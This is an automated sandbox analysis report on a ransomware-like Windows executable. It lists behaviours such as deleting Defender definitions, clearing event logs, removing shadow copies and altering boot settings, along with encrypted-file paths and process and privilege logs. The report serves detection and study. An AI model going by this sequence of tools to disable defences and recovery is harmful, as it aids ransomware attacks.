Analysis
-
max time kernel
47s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22-11-2021 11:29
Static task
static1
Behavioral task
behavioral1
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win10-en-20211104
General
-
Target
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
-
Size
3.5MB
-
MD5
d63d3afed4c1975a7e31906e0e163305
-
SHA1
b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0
-
SHA256
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747
-
SHA512
3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 4040 MpCmdRun.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 836 bcdedit.exe 960 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Kok7cyRH9GI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_cD8T1Ta62_w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_KT5X_5a-7ng0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ntooEAG4iZw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_4jUnHW99lhU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_j-cpD3pkizM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_npbZbbC2RkQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_De-XDsvHc1I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_QUkGLHmyjpg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_d8Cy0Om_DC00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_GDrrLnl9Qm80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wCvXV_5SRPY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RzqTxXV8Kh00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_uzyBLha6YqQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_kOnEkEP7zlc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Ft1jep0weOc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_6UJFVa8n4dQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_L1T_0PpmhVM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aCT1E--oNV40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_e0Tnv6nKEIs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_rKVjXBzkZ8k0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_CQzeRR2fwuc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_mWUWhy92l7M0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xeZSbC3iybQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\Office16\SLERROR.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZU9T9t9bg6w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_44KiIgGyeQ00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_yqlu-bFum4E0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Notcfg4qpYI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_FJifcPY7R4g0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_dkQg7KluZ7Q0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_MV08c-xl9Hw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_jQVu31dwSks0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZKbhH-LHKsg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_TT-plhxUakI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aXouNT_C5lM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wHJ-I32sPWU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\msipc.dll.mui.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_v38_5O1F3nw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_gytsf4yPnRs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_or80xOB3Mhs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_8IzliHU8rzo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_twxsgTk7dgE0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_68mHLYPLW5o0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RmR5Q16n4As0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProDemoR_BypassTrial180-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_UWGXPRHMXOg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense2019_eula.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aL5WYqhk_mg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j__k3kKwu3MQQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\logging.properties.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_vt7KtdL0pGI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ebbVWqMyOms0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xO0owbzLK-M0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HGC-zZvWTJY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HqPgqWRhKL80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_2FZLzCayFfg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\ieinstal.exe.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_SqhIAZhMlLc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_XROsxkszWI00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_iSxK_PUAqD80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_85Ysf6D7XCU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.tlb.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_A9dCVY_pS_o0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ic7Tf1zmC400.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RK4AzX452iI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_axQpdrm92c40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_1IA_NJHZS7I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\cacerts.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_r0Y8Ro3reHo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_bT1e6oe7tn00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1324 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exepid process 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3688 wevtutil.exe Token: SeBackupPrivilege 3688 wevtutil.exe Token: SeSecurityPrivilege 820 wevtutil.exe Token: SeBackupPrivilege 820 wevtutil.exe Token: SeSecurityPrivilege 1288 wevtutil.exe Token: SeBackupPrivilege 1288 wevtutil.exe Token: SeIncreaseQuotaPrivilege 916 wmic.exe Token: SeSecurityPrivilege 916 wmic.exe Token: SeTakeOwnershipPrivilege 916 wmic.exe Token: SeLoadDriverPrivilege 916 wmic.exe Token: SeSystemProfilePrivilege 916 wmic.exe Token: SeSystemtimePrivilege 916 wmic.exe Token: SeProfSingleProcessPrivilege 916 wmic.exe Token: SeIncBasePriorityPrivilege 916 wmic.exe Token: SeCreatePagefilePrivilege 916 wmic.exe Token: SeBackupPrivilege 916 wmic.exe Token: SeRestorePrivilege 916 wmic.exe Token: SeShutdownPrivilege 916 wmic.exe Token: SeDebugPrivilege 916 wmic.exe Token: SeSystemEnvironmentPrivilege 916 wmic.exe Token: SeRemoteShutdownPrivilege 916 wmic.exe Token: SeUndockPrivilege 916 wmic.exe Token: SeManageVolumePrivilege 916 wmic.exe Token: 33 916 wmic.exe Token: 34 916 wmic.exe Token: 35 916 wmic.exe Token: 36 916 wmic.exe Token: SeIncreaseQuotaPrivilege 660 wmic.exe Token: SeSecurityPrivilege 660 wmic.exe Token: SeTakeOwnershipPrivilege 660 wmic.exe Token: SeLoadDriverPrivilege 660 wmic.exe Token: SeSystemProfilePrivilege 660 wmic.exe Token: SeSystemtimePrivilege 660 wmic.exe Token: SeProfSingleProcessPrivilege 660 wmic.exe Token: SeIncBasePriorityPrivilege 660 wmic.exe Token: SeCreatePagefilePrivilege 660 wmic.exe Token: SeBackupPrivilege 660 wmic.exe Token: SeRestorePrivilege 660 wmic.exe Token: SeShutdownPrivilege 660 wmic.exe Token: SeDebugPrivilege 660 wmic.exe Token: SeSystemEnvironmentPrivilege 660 wmic.exe Token: SeRemoteShutdownPrivilege 660 wmic.exe Token: SeUndockPrivilege 660 wmic.exe Token: SeManageVolumePrivilege 660 wmic.exe Token: 33 660 wmic.exe Token: 34 660 wmic.exe Token: 35 660 wmic.exe Token: 36 660 wmic.exe Token: SeIncreaseQuotaPrivilege 660 wmic.exe Token: SeSecurityPrivilege 660 wmic.exe Token: SeTakeOwnershipPrivilege 660 wmic.exe Token: SeLoadDriverPrivilege 660 wmic.exe Token: SeSystemProfilePrivilege 660 wmic.exe Token: SeSystemtimePrivilege 660 wmic.exe Token: SeProfSingleProcessPrivilege 660 wmic.exe Token: SeIncBasePriorityPrivilege 660 wmic.exe Token: SeCreatePagefilePrivilege 660 wmic.exe Token: SeBackupPrivilege 660 wmic.exe Token: SeRestorePrivilege 660 wmic.exe Token: SeShutdownPrivilege 660 wmic.exe Token: SeDebugPrivilege 660 wmic.exe Token: SeSystemEnvironmentPrivilege 660 wmic.exe Token: SeRemoteShutdownPrivilege 660 wmic.exe Token: SeUndockPrivilege 660 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2876 wrote to memory of 3592 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 3592 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 3592 wrote to memory of 3824 3592 net.exe net1.exe PID 3592 wrote to memory of 3824 3592 net.exe net1.exe PID 2876 wrote to memory of 3524 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 3524 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 3524 wrote to memory of 3588 3524 net.exe net1.exe PID 3524 wrote to memory of 3588 3524 net.exe net1.exe PID 2876 wrote to memory of 520 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 520 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 520 wrote to memory of 1152 520 net.exe net1.exe PID 520 wrote to memory of 1152 520 net.exe net1.exe PID 2876 wrote to memory of 852 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 852 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 852 wrote to memory of 2452 852 net.exe net1.exe PID 852 wrote to memory of 2452 852 net.exe net1.exe PID 2876 wrote to memory of 680 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 680 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 680 wrote to memory of 3680 680 net.exe net1.exe PID 680 wrote to memory of 3680 680 net.exe net1.exe PID 2876 wrote to memory of 1252 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 1252 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1252 wrote to memory of 2772 1252 net.exe net1.exe PID 1252 wrote to memory of 2772 1252 net.exe net1.exe PID 2876 wrote to memory of 3384 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 3384 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 3384 wrote to memory of 1492 3384 net.exe net1.exe PID 3384 wrote to memory of 1492 3384 net.exe net1.exe PID 2876 wrote to memory of 608 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 608 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 608 wrote to memory of 716 608 net.exe net1.exe PID 608 wrote to memory of 716 608 net.exe net1.exe PID 2876 wrote to memory of 976 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 2876 wrote to memory of 976 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 976 wrote to memory of 788 976 net.exe net1.exe PID 976 wrote to memory of 788 976 net.exe net1.exe PID 2876 wrote to memory of 3236 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 3236 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1192 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1192 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 